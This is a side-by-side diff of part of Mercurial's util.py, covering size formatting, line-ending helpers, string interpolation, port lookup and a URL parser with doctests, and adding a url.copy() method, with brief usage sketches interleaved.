2796 raise error.ParseError(_(b"line range must be positive"))
2796 raise error.ParseError(_(b"line range must be positive"))
2797 if fromline < 1:
2797 if fromline < 1:
2798 raise error.ParseError(_(b"fromline must be strictly positive"))
2798 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 return fromline - 1, toline
2799 return fromline - 1, toline
2800
2800
2801
2801
2802 bytecount = unitcountfn(
2802 bytecount = unitcountfn(
2803 (100, 1 << 30, _(b'%.0f GB')),
2803 (100, 1 << 30, _(b'%.0f GB')),
2804 (10, 1 << 30, _(b'%.1f GB')),
2804 (10, 1 << 30, _(b'%.1f GB')),
2805 (1, 1 << 30, _(b'%.2f GB')),
2805 (1, 1 << 30, _(b'%.2f GB')),
2806 (100, 1 << 20, _(b'%.0f MB')),
2806 (100, 1 << 20, _(b'%.0f MB')),
2807 (10, 1 << 20, _(b'%.1f MB')),
2807 (10, 1 << 20, _(b'%.1f MB')),
2808 (1, 1 << 20, _(b'%.2f MB')),
2808 (1, 1 << 20, _(b'%.2f MB')),
2809 (100, 1 << 10, _(b'%.0f KB')),
2809 (100, 1 << 10, _(b'%.0f KB')),
2810 (10, 1 << 10, _(b'%.1f KB')),
2810 (10, 1 << 10, _(b'%.1f KB')),
2811 (1, 1 << 10, _(b'%.2f KB')),
2811 (1, 1 << 10, _(b'%.2f KB')),
2812 (1, 1, _(b'%.0f bytes')),
2812 (1, 1, _(b'%.0f bytes')),
2813 )
2813 )
2814
2814
2815
2815
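A sketch of how unitcountfn() builds a formatter: bytecount() above picks the first row whose threshold the value reaches, and a custom counter can be built the same way (the item-count table below is illustrative only, not part of the module).

# bytecount(0)              -> '0 bytes'
# bytecount(2048)           -> '2.00 KB'
# bytecount(5 * (1 << 20))  -> '5.00 MB'
itemcount = unitcountfn(
    (1, 1000000, b'%.1f M items'),
    (1, 1000, b'%.1f k items'),
    (1, 1, b'%d items'),
)
# itemcount(1500)           -> '1.5 k items'
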
2816 class transformingwriter(object):
2816 class transformingwriter(object):
2817 """Writable file wrapper to transform data by function"""
2817 """Writable file wrapper to transform data by function"""
2818
2818
2819 def __init__(self, fp, encode):
2819 def __init__(self, fp, encode):
2820 self._fp = fp
2820 self._fp = fp
2821 self._encode = encode
2821 self._encode = encode
2822
2822
2823 def close(self):
2823 def close(self):
2824 self._fp.close()
2824 self._fp.close()
2825
2825
2826 def flush(self):
2826 def flush(self):
2827 self._fp.flush()
2827 self._fp.flush()
2828
2828
2829 def write(self, data):
2829 def write(self, data):
2830 return self._fp.write(self._encode(data))
2830 return self._fp.write(self._encode(data))
2831
2831
2832
2832
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2835 # stray CR is an error.
2835 # stray CR is an error.
2836 _eolre = remod.compile(br'\r*\n')
2836 _eolre = remod.compile(br'\r*\n')
2837
2837
2838
2838
2839 def tolf(s):
2839 def tolf(s):
2840 # type: (bytes) -> bytes
2840 # type: (bytes) -> bytes
2841 return _eolre.sub(b'\n', s)
2841 return _eolre.sub(b'\n', s)
2842
2842
2843
2843
2844 def tocrlf(s):
2844 def tocrlf(s):
2845 # type: (bytes) -> bytes
2845 # type: (bytes) -> bytes
2846 return _eolre.sub(b'\r\n', s)
2846 return _eolre.sub(b'\r\n', s)
2847
2847
2848
2848
2849 def _crlfwriter(fp):
2849 def _crlfwriter(fp):
2850 return transformingwriter(fp, tocrlf)
2850 return transformingwriter(fp, tocrlf)
2851
2851
2852
2852
2853 if pycompat.oslinesep == b'\r\n':
2853 if pycompat.oslinesep == b'\r\n':
2854 tonativeeol = tocrlf
2854 tonativeeol = tocrlf
2855 fromnativeeol = tolf
2855 fromnativeeol = tolf
2856 nativeeolwriter = _crlfwriter
2856 nativeeolwriter = _crlfwriter
2857 else:
2857 else:
2858 tonativeeol = pycompat.identity
2858 tonativeeol = pycompat.identity
2859 fromnativeeol = pycompat.identity
2859 fromnativeeol = pycompat.identity
2860 nativeeolwriter = pycompat.identity
2860 nativeeolwriter = pycompat.identity
2861
2861
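A sketch of the EOL helpers: tolf()/tocrlf() normalize line endings and transformingwriter applies such a transform on every write; io.BytesIO is a stand-in output stream.

import io

assert tocrlf(b'a\nb\r\r\n') == b'a\r\nb\r\n'   # runs of CR before LF collapse
assert tolf(b'a\r\nb\n') == b'a\nb\n'
out = io.BytesIO()
writer = transformingwriter(out, tocrlf)
writer.write(b'line one\nline two\n')
assert out.getvalue() == b'line one\r\nline two\r\n'
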
2862 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2862 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 3,
2863 3,
2864 0,
2864 0,
2865 ):
2865 ):
2866 # There is an issue in CPython that some IO methods do not handle EINTR
2866 # There is an issue in CPython that some IO methods do not handle EINTR
2867 # correctly. The following table shows what CPython version (and functions)
2867 # correctly. The following table shows what CPython version (and functions)
2868 # are affected (buggy: has the EINTR bug, okay: otherwise):
2868 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 #
2869 #
2870 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2870 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 # --------------------------------------------------
2871 # --------------------------------------------------
2872 # fp.__iter__ | buggy | buggy | okay
2872 # fp.__iter__ | buggy | buggy | okay
2873 # fp.read* | buggy | okay [1] | okay
2873 # fp.read* | buggy | okay [1] | okay
2874 #
2874 #
2875 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2875 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 #
2876 #
2877 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2877 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2878 # like "read*" work fine, as we do not support Python < 2.7.4.
2878 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 #
2879 #
2880 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2880 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2881 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2881 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2882 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 # fp.__iter__ but not other fp.read* methods.
2883 # fp.__iter__ but not other fp.read* methods.
2884 #
2884 #
2885 # On modern systems like Linux, the "read" syscall cannot be interrupted
2885 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 # when reading "fast" files like on-disk files. So the EINTR issue only
2886 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2887 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 # files approximately as "fast" files and use the fast (unsafe) code path,
2888 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 # to minimize the performance impact.
2889 # to minimize the performance impact.
2890
2890
2891 def iterfile(fp):
2891 def iterfile(fp):
2892 fastpath = True
2892 fastpath = True
2893 if type(fp) is file:
2893 if type(fp) is file:
2894 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2894 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 if fastpath:
2895 if fastpath:
2896 return fp
2896 return fp
2897 else:
2897 else:
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 return iter(fp.readline, b'')
2899 return iter(fp.readline, b'')
2900
2900
2901
2901
2902 else:
2902 else:
2903 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2903 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 def iterfile(fp):
2904 def iterfile(fp):
2905 return fp
2905 return fp
2906
2906
2907
2907
2908 def iterlines(iterator):
2908 def iterlines(iterator):
2909 # type: (Iterator[bytes]) -> Iterator[bytes]
2909 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 for chunk in iterator:
2910 for chunk in iterator:
2911 for line in chunk.splitlines():
2911 for line in chunk.splitlines():
2912 yield line
2912 yield line
2913
2913
2914
2914
2915 def expandpath(path):
2915 def expandpath(path):
2916 # type: (bytes) -> bytes
2916 # type: (bytes) -> bytes
2917 return os.path.expanduser(os.path.expandvars(path))
2917 return os.path.expanduser(os.path.expandvars(path))
2918
2918
2919
2919
2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 """Return the result of interpolating items in the mapping into string s.
2921 """Return the result of interpolating items in the mapping into string s.
2922
2922
2923 prefix is a single character string, or a two character string with
2923 prefix is a single character string, or a two character string with
2924 a backslash as the first character if the prefix needs to be escaped in
2924 a backslash as the first character if the prefix needs to be escaped in
2925 a regular expression.
2925 a regular expression.
2926
2926
2927 fn is an optional function that will be applied to the replacement text
2927 fn is an optional function that will be applied to the replacement text
2928 just before replacement.
2928 just before replacement.
2929
2929
2930 escape_prefix is an optional flag that allows a doubled prefix to be
2930 escape_prefix is an optional flag that allows a doubled prefix to be
2931 used as an escape for the prefix character itself.
2931 used as an escape for the prefix character itself.
2932 """
2932 """
2933 fn = fn or (lambda s: s)
2933 fn = fn or (lambda s: s)
2934 patterns = b'|'.join(mapping.keys())
2934 patterns = b'|'.join(mapping.keys())
2935 if escape_prefix:
2935 if escape_prefix:
2936 patterns += b'|' + prefix
2936 patterns += b'|' + prefix
2937 if len(prefix) > 1:
2937 if len(prefix) > 1:
2938 prefix_char = prefix[1:]
2938 prefix_char = prefix[1:]
2939 else:
2939 else:
2940 prefix_char = prefix
2940 prefix_char = prefix
2941 mapping[prefix_char] = prefix_char
2941 mapping[prefix_char] = prefix_char
2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944
2944
2945
2945
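A sketch of interpolate(); because the prefix is spliced into a regular expression, '$' must be passed pre-escaped as br'\$'. The mapping keys and the input string are placeholders.

mapping = {b'user': b'alice', b'repo': b'main'}
s = interpolate(
    br'\$', mapping, b'$user pushed to $repo, cost: $$5', escape_prefix=True
)
# -> b'alice pushed to main, cost: $5' ('$$' collapses to a literal '$')
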
2946 def getport(port):
2946 def getport(port):
2947 # type: (Union[bytes, int]) -> int
2947 # type: (Union[bytes, int]) -> int
2948 """Return the port for a given network service.
2948 """Return the port for a given network service.
2949
2949
2950 If port is an integer, it's returned as is. If it's a string, it's
2950 If port is an integer, it's returned as is. If it's a string, it's
2951 looked up using socket.getservbyname(). If there's no matching
2951 looked up using socket.getservbyname(). If there's no matching
2952 service, error.Abort is raised.
2952 service, error.Abort is raised.
2953 """
2953 """
2954 try:
2954 try:
2955 return int(port)
2955 return int(port)
2956 except ValueError:
2956 except ValueError:
2957 pass
2957 pass
2958
2958
2959 try:
2959 try:
2960 return socket.getservbyname(pycompat.sysstr(port))
2960 return socket.getservbyname(pycompat.sysstr(port))
2961 except socket.error:
2961 except socket.error:
2962 raise error.Abort(
2962 raise error.Abort(
2963 _(b"no port number associated with service '%s'") % port
2963 _(b"no port number associated with service '%s'") % port
2964 )
2964 )
2965
2965
2966
2966
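A sketch of getport(); the numeric cases are exact, while the name lookup consults the system services database, so the b'http' line assumes a standard /etc/services.

assert getport(8080) == 8080        # integers pass straight through
assert getport(b'8080') == 8080     # numeric strings are converted
# getport(b'http') -> 80 on most systems; unknown names raise error.Abort
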
2967 class url(object):
2967 class url(object):
2968 r"""Reliable URL parser.
2968 r"""Reliable URL parser.
2969
2969
2970 This parses URLs and provides attributes for the following
2970 This parses URLs and provides attributes for the following
2971 components:
2971 components:
2972
2972
2973 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2973 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974
2974
2975 Missing components are set to None. The only exception is
2975 Missing components are set to None. The only exception is
2976 fragment, which is set to '' if present but empty.
2976 fragment, which is set to '' if present but empty.
2977
2977
2978 If parsefragment is False, fragment is included in query. If
2978 If parsefragment is False, fragment is included in query. If
2979 parsequery is False, query is included in path. If both are
2979 parsequery is False, query is included in path. If both are
2980 False, both fragment and query are included in path.
2980 False, both fragment and query are included in path.
2981
2981
2982 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2982 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983
2983
2984 Note that for backward compatibility reasons, bundle URLs do not
2984 Note that for backward compatibility reasons, bundle URLs do not
2985 take host names. That means 'bundle://../' has a path of '../'.
2985 take host names. That means 'bundle://../' has a path of '../'.
2986
2986
2987 Examples:
2987 Examples:
2988
2988
2989 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2989 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2990 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2991 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2992 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 >>> url(b'file:///home/joe/repo')
2993 >>> url(b'file:///home/joe/repo')
2994 <url scheme: 'file', path: '/home/joe/repo'>
2994 <url scheme: 'file', path: '/home/joe/repo'>
2995 >>> url(b'file:///c:/temp/foo/')
2995 >>> url(b'file:///c:/temp/foo/')
2996 <url scheme: 'file', path: 'c:/temp/foo/'>
2996 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 >>> url(b'bundle:foo')
2997 >>> url(b'bundle:foo')
2998 <url scheme: 'bundle', path: 'foo'>
2998 <url scheme: 'bundle', path: 'foo'>
2999 >>> url(b'bundle://../foo')
2999 >>> url(b'bundle://../foo')
3000 <url scheme: 'bundle', path: '../foo'>
3000 <url scheme: 'bundle', path: '../foo'>
3001 >>> url(br'c:\foo\bar')
3001 >>> url(br'c:\foo\bar')
3002 <url path: 'c:\\foo\\bar'>
3002 <url path: 'c:\\foo\\bar'>
3003 >>> url(br'\\blah\blah\blah')
3003 >>> url(br'\\blah\blah\blah')
3004 <url path: '\\\\blah\\blah\\blah'>
3004 <url path: '\\\\blah\\blah\\blah'>
3005 >>> url(br'\\blah\blah\blah#baz')
3005 >>> url(br'\\blah\blah\blah#baz')
3006 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3006 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 >>> url(br'file:///C:\users\me')
3007 >>> url(br'file:///C:\users\me')
3008 <url scheme: 'file', path: 'C:\\users\\me'>
3008 <url scheme: 'file', path: 'C:\\users\\me'>
3009
3009
3010 Authentication credentials:
3010 Authentication credentials:
3011
3011
3012 >>> url(b'ssh://joe:xyz@x/repo')
3012 >>> url(b'ssh://joe:xyz@x/repo')
3013 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3013 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 >>> url(b'ssh://joe@x/repo')
3014 >>> url(b'ssh://joe@x/repo')
3015 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3015 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016
3016
3017 Query strings and fragments:
3017 Query strings and fragments:
3018
3018
3019 >>> url(b'http://host/a?b#c')
3019 >>> url(b'http://host/a?b#c')
3020 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3020 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3021 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3022 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023
3023
3024 Empty path:
3024 Empty path:
3025
3025
3026 >>> url(b'')
3026 >>> url(b'')
3027 <url path: ''>
3027 <url path: ''>
3028 >>> url(b'#a')
3028 >>> url(b'#a')
3029 <url path: '', fragment: 'a'>
3029 <url path: '', fragment: 'a'>
3030 >>> url(b'http://host/')
3030 >>> url(b'http://host/')
3031 <url scheme: 'http', host: 'host', path: ''>
3031 <url scheme: 'http', host: 'host', path: ''>
3032 >>> url(b'http://host/#a')
3032 >>> url(b'http://host/#a')
3033 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3033 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034
3034
3035 Only scheme:
3035 Only scheme:
3036
3036
3037 >>> url(b'http:')
3037 >>> url(b'http:')
3038 <url scheme: 'http'>
3038 <url scheme: 'http'>
3039 """
3039 """
3040
3040
3041 _safechars = b"!~*'()+"
3041 _safechars = b"!~*'()+"
3042 _safepchars = b"/!~*'()+:\\"
3042 _safepchars = b"/!~*'()+:\\"
3043 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3043 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044
3044
3045 def __init__(self, path, parsequery=True, parsefragment=True):
3045 def __init__(self, path, parsequery=True, parsefragment=True):
3046 # type: (bytes, bool, bool) -> None
3046 # type: (bytes, bool, bool) -> None
3047 # We slowly chomp away at path until we have only the path left
3047 # We slowly chomp away at path until we have only the path left
3048 self.scheme = self.user = self.passwd = self.host = None
3048 self.scheme = self.user = self.passwd = self.host = None
3049 self.port = self.path = self.query = self.fragment = None
3049 self.port = self.path = self.query = self.fragment = None
3050 self._localpath = True
3050 self._localpath = True
3051 self._hostport = b''
3051 self._hostport = b''
3052 self._origpath = path
3052 self._origpath = path
3053
3053
3054 if parsefragment and b'#' in path:
3054 if parsefragment and b'#' in path:
3055 path, self.fragment = path.split(b'#', 1)
3055 path, self.fragment = path.split(b'#', 1)
3056
3056
3057 # special case for Windows drive letters and UNC paths
3057 # special case for Windows drive letters and UNC paths
3058 if hasdriveletter(path) or path.startswith(b'\\\\'):
3058 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 self.path = path
3059 self.path = path
3060 return
3060 return
3061
3061
3062 # For compatibility reasons, we can't handle bundle paths as
3062 # For compatibility reasons, we can't handle bundle paths as
3063 # normal URLs
3063 # normal URLs
3064 if path.startswith(b'bundle:'):
3064 if path.startswith(b'bundle:'):
3065 self.scheme = b'bundle'
3065 self.scheme = b'bundle'
3066 path = path[7:]
3066 path = path[7:]
3067 if path.startswith(b'//'):
3067 if path.startswith(b'//'):
3068 path = path[2:]
3068 path = path[2:]
3069 self.path = path
3069 self.path = path
3070 return
3070 return
3071
3071
3072 if self._matchscheme(path):
3072 if self._matchscheme(path):
3073 parts = path.split(b':', 1)
3073 parts = path.split(b':', 1)
3074 if parts[0]:
3074 if parts[0]:
3075 self.scheme, path = parts
3075 self.scheme, path = parts
3076 self._localpath = False
3076 self._localpath = False
3077
3077
3078 if not path:
3078 if not path:
3079 path = None
3079 path = None
3080 if self._localpath:
3080 if self._localpath:
3081 self.path = b''
3081 self.path = b''
3082 return
3082 return
3083 else:
3083 else:
3084 if self._localpath:
3084 if self._localpath:
3085 self.path = path
3085 self.path = path
3086 return
3086 return
3087
3087
3088 if parsequery and b'?' in path:
3088 if parsequery and b'?' in path:
3089 path, self.query = path.split(b'?', 1)
3089 path, self.query = path.split(b'?', 1)
3090 if not path:
3090 if not path:
3091 path = None
3091 path = None
3092 if not self.query:
3092 if not self.query:
3093 self.query = None
3093 self.query = None
3094
3094
3095 # // is required to specify a host/authority
3095 # // is required to specify a host/authority
3096 if path and path.startswith(b'//'):
3096 if path and path.startswith(b'//'):
3097 parts = path[2:].split(b'/', 1)
3097 parts = path[2:].split(b'/', 1)
3098 if len(parts) > 1:
3098 if len(parts) > 1:
3099 self.host, path = parts
3099 self.host, path = parts
3100 else:
3100 else:
3101 self.host = parts[0]
3101 self.host = parts[0]
3102 path = None
3102 path = None
3103 if not self.host:
3103 if not self.host:
3104 self.host = None
3104 self.host = None
3105 # path of file:///d is /d
3105 # path of file:///d is /d
3106 # path of file:///d:/ is d:/, not /d:/
3106 # path of file:///d:/ is d:/, not /d:/
3107 if path and not hasdriveletter(path):
3107 if path and not hasdriveletter(path):
3108 path = b'/' + path
3108 path = b'/' + path
3109
3109
3110 if self.host and b'@' in self.host:
3110 if self.host and b'@' in self.host:
3111 self.user, self.host = self.host.rsplit(b'@', 1)
3111 self.user, self.host = self.host.rsplit(b'@', 1)
3112 if b':' in self.user:
3112 if b':' in self.user:
3113 self.user, self.passwd = self.user.split(b':', 1)
3113 self.user, self.passwd = self.user.split(b':', 1)
3114 if not self.host:
3114 if not self.host:
3115 self.host = None
3115 self.host = None
3116
3116
3117 # Don't split on colons in IPv6 addresses without ports
3117 # Don't split on colons in IPv6 addresses without ports
3118 if (
3118 if (
3119 self.host
3119 self.host
3120 and b':' in self.host
3120 and b':' in self.host
3121 and not (
3121 and not (
3122 self.host.startswith(b'[') and self.host.endswith(b']')
3122 self.host.startswith(b'[') and self.host.endswith(b']')
3123 )
3123 )
3124 ):
3124 ):
3125 self._hostport = self.host
3125 self._hostport = self.host
3126 self.host, self.port = self.host.rsplit(b':', 1)
3126 self.host, self.port = self.host.rsplit(b':', 1)
3127 if not self.host:
3127 if not self.host:
3128 self.host = None
3128 self.host = None
3129
3129
3130 if (
3130 if (
3131 self.host
3131 self.host
3132 and self.scheme == b'file'
3132 and self.scheme == b'file'
3133 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3133 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 ):
3134 ):
3135 raise error.Abort(
3135 raise error.Abort(
3136 _(b'file:// URLs can only refer to localhost')
3136 _(b'file:// URLs can only refer to localhost')
3137 )
3137 )
3138
3138
3139 self.path = path
3139 self.path = path
3140
3140
3141 # leave the query string escaped
3141 # leave the query string escaped
3142 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3142 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 v = getattr(self, a)
3143 v = getattr(self, a)
3144 if v is not None:
3144 if v is not None:
3145 setattr(self, a, urlreq.unquote(v))
3145 setattr(self, a, urlreq.unquote(v))
3146
3146
3147 def copy(self):
3148 u = url(b'temporary useless value')
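        # the constructor argument above is only a throwaway placeholder;
        # every attribute of the new instance is overwritten just below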
3149 u.path = self.path
3150 u.scheme = self.scheme
3151 u.user = self.user
3152 u.passwd = self.passwd
3153 u.host = self.host
3154 u.path = self.path
3155 u.query = self.query
3156 u.fragment = self.fragment
3157 u._localpath = self._localpath
3158 u._hostport = self._hostport
3159 u._origpath = self._origpath
3160 return u
3161
3147 @encoding.strmethod
3162 @encoding.strmethod
3148 def __repr__(self):
3163 def __repr__(self):
3149 attrs = []
3164 attrs = []
3150 for a in (
3165 for a in (
3151 b'scheme',
3166 b'scheme',
3152 b'user',
3167 b'user',
3153 b'passwd',
3168 b'passwd',
3154 b'host',
3169 b'host',
3155 b'port',
3170 b'port',
3156 b'path',
3171 b'path',
3157 b'query',
3172 b'query',
3158 b'fragment',
3173 b'fragment',
3159 ):
3174 ):
3160 v = getattr(self, a)
3175 v = getattr(self, a)
3161 if v is not None:
3176 if v is not None:
3162 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3177 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3163 return b'<url %s>' % b', '.join(attrs)
3178 return b'<url %s>' % b', '.join(attrs)
3164
3179
3165 def __bytes__(self):
3180 def __bytes__(self):
3166 r"""Join the URL's components back into a URL string.
3181 r"""Join the URL's components back into a URL string.
3167
3182
3168 Examples:
3183 Examples:
3169
3184
3170 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3185 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3171 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3186 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3172 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3187 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3173 'http://user:pw@host:80/?foo=bar&baz=42'
3188 'http://user:pw@host:80/?foo=bar&baz=42'
3174 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3189 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3175 'http://user:pw@host:80/?foo=bar%3dbaz'
3190 'http://user:pw@host:80/?foo=bar%3dbaz'
3176 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3191 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3177 'ssh://user:pw@[::1]:2200//home/joe#'
3192 'ssh://user:pw@[::1]:2200//home/joe#'
3178 >>> bytes(url(b'http://localhost:80//'))
3193 >>> bytes(url(b'http://localhost:80//'))
3179 'http://localhost:80//'
3194 'http://localhost:80//'
3180 >>> bytes(url(b'http://localhost:80/'))
3195 >>> bytes(url(b'http://localhost:80/'))
3181 'http://localhost:80/'
3196 'http://localhost:80/'
3182 >>> bytes(url(b'http://localhost:80'))
3197 >>> bytes(url(b'http://localhost:80'))
3183 'http://localhost:80/'
3198 'http://localhost:80/'
3184 >>> bytes(url(b'bundle:foo'))
3199 >>> bytes(url(b'bundle:foo'))
3185 'bundle:foo'
3200 'bundle:foo'
3186 >>> bytes(url(b'bundle://../foo'))
3201 >>> bytes(url(b'bundle://../foo'))
3187 'bundle:../foo'
3202 'bundle:../foo'
3188 >>> bytes(url(b'path'))
3203 >>> bytes(url(b'path'))
3189 'path'
3204 'path'
3190 >>> bytes(url(b'file:///tmp/foo/bar'))
3205 >>> bytes(url(b'file:///tmp/foo/bar'))
3191 'file:///tmp/foo/bar'
3206 'file:///tmp/foo/bar'
3192 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3207 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3193 'file:///c:/tmp/foo/bar'
3208 'file:///c:/tmp/foo/bar'
3194 >>> print(url(br'bundle:foo\bar'))
3209 >>> print(url(br'bundle:foo\bar'))
3195 bundle:foo\bar
3210 bundle:foo\bar
3196 >>> print(url(br'file:///D:\data\hg'))
3211 >>> print(url(br'file:///D:\data\hg'))
3197 file:///D:\data\hg
3212 file:///D:\data\hg
3198 """
3213 """
3199 if self._localpath:
3214 if self._localpath:
3200 s = self.path
3215 s = self.path
3201 if self.scheme == b'bundle':
3216 if self.scheme == b'bundle':
3202 s = b'bundle:' + s
3217 s = b'bundle:' + s
3203 if self.fragment:
3218 if self.fragment:
3204 s += b'#' + self.fragment
3219 s += b'#' + self.fragment
3205 return s
3220 return s
3206
3221
3207 s = self.scheme + b':'
3222 s = self.scheme + b':'
3208 if self.user or self.passwd or self.host:
3223 if self.user or self.passwd or self.host:
3209 s += b'//'
3224 s += b'//'
3210 elif self.scheme and (
3225 elif self.scheme and (
3211 not self.path
3226 not self.path
3212 or self.path.startswith(b'/')
3227 or self.path.startswith(b'/')
3213 or hasdriveletter(self.path)
3228 or hasdriveletter(self.path)
3214 ):
3229 ):
3215 s += b'//'
3230 s += b'//'
3216 if hasdriveletter(self.path):
3231 if hasdriveletter(self.path):
3217 s += b'/'
3232 s += b'/'
3218 if self.user:
3233 if self.user:
3219 s += urlreq.quote(self.user, safe=self._safechars)
3234 s += urlreq.quote(self.user, safe=self._safechars)
3220 if self.passwd:
3235 if self.passwd:
3221 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3236 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3222 if self.user or self.passwd:
3237 if self.user or self.passwd:
3223 s += b'@'
3238 s += b'@'
3224 if self.host:
3239 if self.host:
3225 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3240 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3226 s += urlreq.quote(self.host)
3241 s += urlreq.quote(self.host)
3227 else:
3242 else:
3228 s += self.host
3243 s += self.host
3229 if self.port:
3244 if self.port:
3230 s += b':' + urlreq.quote(self.port)
3245 s += b':' + urlreq.quote(self.port)
3231 if self.host:
3246 if self.host:
3232 s += b'/'
3247 s += b'/'
3233 if self.path:
3248 if self.path:
3234 # TODO: similar to the query string, we should not unescape the
3249 # TODO: similar to the query string, we should not unescape the
3235 # path when we store it, the path might contain '%2f' = '/',
3250 # path when we store it, the path might contain '%2f' = '/',
3236 # which we should *not* escape.
3251 # which we should *not* escape.
3237 s += urlreq.quote(self.path, safe=self._safepchars)
3252 s += urlreq.quote(self.path, safe=self._safepchars)
3238 if self.query:
3253 if self.query:
3239 # we store the query in escaped form.
3254 # we store the query in escaped form.
3240 s += b'?' + self.query
3255 s += b'?' + self.query
3241 if self.fragment is not None:
3256 if self.fragment is not None:
3242 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3257 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3243 return s
3258 return s
3244
3259
3245 __str__ = encoding.strmethod(__bytes__)
3260 __str__ = encoding.strmethod(__bytes__)
3246
3261
3247 def authinfo(self):
3262 def authinfo(self):
3248 user, passwd = self.user, self.passwd
3263 user, passwd = self.user, self.passwd
3249 try:
3264 try:
3250 self.user, self.passwd = None, None
3265 self.user, self.passwd = None, None
3251 s = bytes(self)
3266 s = bytes(self)
3252 finally:
3267 finally:
3253 self.user, self.passwd = user, passwd
3268 self.user, self.passwd = user, passwd
3254 if not self.user:
3269 if not self.user:
